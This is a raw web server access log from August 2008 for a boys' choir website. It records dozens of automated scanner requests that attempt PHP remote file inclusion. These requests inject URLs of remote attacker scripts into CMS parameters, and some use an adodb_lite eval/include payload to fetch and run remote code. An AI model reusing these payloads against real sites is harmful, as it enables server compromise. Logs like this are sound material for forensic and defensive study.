118.129.166.13 - - [20/Aug/2008:05:22:23 -0700] "GET /logs/access_080814.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
118.129.166.13 - - [20/Aug/2008:05:22:23 -0700] "GET /logs//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
118.129.166.13 - - [20/Aug/2008:05:22:23 -0700] "GET //include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
118.129.166.13 - - [20/Aug/2008:05:22:24 -0700] "GET /logs//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:22:45 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:22:45 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
70.85.201.66 - - [20/Aug/2008:05:22:47 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
70.85.201.66 - - [20/Aug/2008:05:22:47 -0700] "GET //modules/My_eGallery/index.php?basepath=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
213.248.60.128 - - [20/Aug/2008:05:22:58 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
213.248.60.128 - - [20/Aug/2008:05:22:58 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
87.230.22.202 - - [20/Aug/2008:05:23:01 -0700] "GET /logs/access_080730.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://acc-advertising.com/img/idnya.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
87.230.22.202 - - [20/Aug/2008:05:23:02 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://acc-advertising.com/img/idnya.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
87.230.22.202 - - [20/Aug/2008:05:23:02 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://acc-advertising.com/img/idnya.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
213.248.60.128 - - [20/Aug/2008:05:23:04 -0700] "GET /logs/access_080805.log///vwar/backup/errors.php?error=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
201.130.79.132 - - [20/Aug/2008:05:23:20 -0700] "GET /logs/access.log/www.site.com/path/components/com_facileforms/facileforms.frame.php?ff_compath=http://melissa.lu/components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
59.92.153.178 - - [20/Aug/2008:05:23:32 -0700] "GET /xxx/ HTTP/1.1" 200 662 "http://www.google.co.in/search?hl=en&q=%3Fintitle:index.of:+xxx&start=10&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.americanboyschoir.com"
217.110.54.240 - - [20/Aug/2008:05:23:36 -0700] "GET /logs/access_080808.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
87.230.22.202 - - [20/Aug/2008:05:23:41 -0700] "GET /logs/access_080808.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://acc-advertising.com/img/idnya.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:23:46 -0700] "GET /logs/access_080730.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:23:46 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:23:46 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:23:49 -0700] "GET /logs/access_080730.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:23:49 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:23:49 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
67.41.4.26 - - [20/Aug/2008:05:23:57 -0700] "GET /logs//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.keys.idv.tw/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
67.41.4.26 - - [20/Aug/2008:05:23:57 -0700] "GET //com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.keys.idv.tw/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:24:01 -0700] "GET /logs/access_080808.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:24:04 -0700] "GET /logs/access_080808.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
70.85.201.66 - - [20/Aug/2008:05:24:16 -0700] "GET /logs/access_080812.log//modules/My_eGallery/index.php?basepath=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
70.85.201.66 - - [20/Aug/2008:05:24:16 -0700] "GET //modules/My_eGallery/index.php?basepath=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
70.85.201.66 - - [20/Aug/2008:05:24:16 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
70.85.201.66 - - [20/Aug/2008:05:24:16 -0700] "GET /logs/access_080805.log//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
59.92.153.178 - - [20/Aug/2008:05:24:23 -0700] "GET /xxx/resourcesgreg/ HTTP/1.1" 200 552 "http://www.americanboyschoir.com/xxx/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.americanboyschoir.com"
59.92.153.178 - - [20/Aug/2008:05:24:27 -0700] "GET /xxx/ HTTP/1.1" 200 662 "http://www.americanboyschoir.com/xxx/resourcesgreg/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.americanboyschoir.com"
59.92.153.178 - - [20/Aug/2008:05:24:29 -0700] "GET / HTTP/1.1" 200 1724 "http://www.americanboyschoir.com/xxx/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.americanboyschoir.com"
59.92.153.178 - - [20/Aug/2008:05:24:34 -0700] "GET /xxxx/ HTTP/1.1" 200 522 "http://www.americanboyschoir.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.americanboyschoir.com"
59.92.153.178 - - [20/Aug/2008:05:24:43 -0700] "GET /x/ HTTP/1.1" 200 516 "http://www.americanboyschoir.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.americanboyschoir.com"
59.92.153.178 - - [20/Aug/2008:05:24:45 -0700] "GET /xxxxxxx/ HTTP/1.1" 200 939 "http://www.americanboyschoir.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.americanboyschoir.com"
59.92.153.178 - - [20/Aug/2008:05:24:50 -0700] "GET /xxxxxxx/images/ HTTP/1.1" 200 550 "http://www.americanboyschoir.com/xxxxxxx/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.americanboyschoir.com"
62.119.28.109 - - [20/Aug/2008:05:24:51 -0700] "GET /logs/access.log//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
62.119.28.109 - - [20/Aug/2008:05:24:51 -0700] "GET //?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
62.119.28.109 - - [20/Aug/2008:05:24:52 -0700] "GET /logs//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1658 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
59.92.153.178 - - [20/Aug/2008:05:24:55 -0700] "GET /xxxxxxxx/ HTTP/1.1" 200 666 "http://www.americanboyschoir.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.americanboyschoir.com"
59.92.153.178 - - [20/Aug/2008:05:24:58 -0700] "GET /xxxxxxxxx/ HTTP/1.1" 200 532 "http://www.americanboyschoir.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.americanboyschoir.com"
59.92.153.178 - - [20/Aug/2008:05:25:00 -0700] "GET /xxxxxxxxxx/ HTTP/1.1" 200 534 "http://www.americanboyschoir.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.americanboyschoir.com"
59.92.153.178 - - [20/Aug/2008:05:25:05 -0700] "GET /xxxxxxx/ HTTP/1.1" 200 939 "http://www.americanboyschoir.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.americanboyschoir.com"
222.122.31.174 - - [20/Aug/2008:05:25:05 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.benjaminclayton.co.uk//help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
222.122.31.174 - - [20/Aug/2008:05:25:05 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.benjaminclayton.co.uk//help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
222.122.31.174 - - [20/Aug/2008:05:25:05 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.benjaminclayton.co.uk//help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
59.92.153.178 - - [20/Aug/2008:05:25:06 -0700] "GET /xxxxxxx/resources/ HTTP/1.1" 200 556 "http://www.americanboyschoir.com/xxxxxxx/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.americanboyschoir.com"
59.92.153.178 - - [20/Aug/2008:05:25:12 -0700] "GET / HTTP/1.1" 200 1724 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.americanboyschoir.com"
59.92.153.178 - - [20/Aug/2008:05:25:16 -0700] "GET / HTTP/1.1" 200 1724 "http://www.americanboyschoir.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.americanboyschoir.com"
59.92.153.178 - - [20/Aug/2008:05:25:18 -0700] "GET / HTTP/1.1" 200 1724 "http://www.americanboyschoir.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:25:24 -0700] "GET /logs/access_080730.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:25:24 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:25:24 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:25:29 -0700] "GET /logs/access_080730.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.minorleaguesportsfans.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:25:29 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.minorleaguesportsfans.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:25:29 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.minorleaguesportsfans.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
62.119.28.109 - - [20/Aug/2008:05:25:36 -0700] "GET /logs/access_080812.log//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:25:47 -0700] "GET /logs/access_080730.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:25:47 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:25:48 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:25:53 -0700] "GET /logs/access_080808.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:25:54 -0700] "GET /logs/access_080808.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.minorleaguesportsfans.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:26:12 -0700] "GET /logs/access_080808.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:26:52 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:26:52 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:26:52 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:26:56 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:26:57 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:26:57 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:26:57 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:26:57 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:26:57 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:26:57 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:26:57 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:26:57 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:26:58 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:26:58 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:26:58 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:26:58 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:26:58 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:26:59 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
61.100.30.4 - - [20/Aug/2008:05:27:25 -0700] "GET /logs/access_080808.log//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
217.110.54.240 - - [20/Aug/2008:05:27:37 -0700] "GET /logs/access_080805.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
217.110.54.240 - - [20/Aug/2008:05:27:38 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
217.110.54.240 - - [20/Aug/2008:05:27:38 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
64.185.237.191 - - [20/Aug/2008:05:27:39 -0700] "GET /logs/access_080729.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
64.185.237.191 - - [20/Aug/2008:05:27:40 -0700] "GET /logs/access_080729.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
70.85.201.66 - - [20/Aug/2008:05:28:11 -0700] "GET /logs/access_080814.log//include/lib.inc.php?site_path=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
70.85.201.66 - - [20/Aug/2008:05:28:11 -0700] "GET //include/lib.inc.php?site_path=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
70.85.201.66 - - [20/Aug/2008:05:28:11 -0700] "GET /logs//include/lib.inc.php?site_path=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
85.10.136.249 - - [20/Aug/2008:05:28:23 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_frontpage&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://babbfamilyalbum.com/install/ubutuid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
85.10.136.249 - - [20/Aug/2008:05:28:25 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_frontpage&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://babbfamilyalbum.com/install/ubutuid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
85.10.136.249 - - [20/Aug/2008:05:28:25 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_frontpage&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://babbfamilyalbum.com/install/ubutuid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
74.6.22.167 - - [20/Aug/2008:05:28:58 -0700] "GET /logs/?M=A HTTP/1.0" 200 1637 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.americanboyschoir.com"
217.110.54.240 - - [20/Aug/2008:05:29:04 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "americanboyschoir.com"
217.110.54.240 - - [20/Aug/2008:05:29:04 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "americanboyschoir.com"
217.110.54.240 - - [20/Aug/2008:05:29:05 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:31:21 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:31:22 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
222.122.31.174 - - [20/Aug/2008:05:31:26 -0700] "GET /logs/access_080806.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.benjaminclayton.co.uk//help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
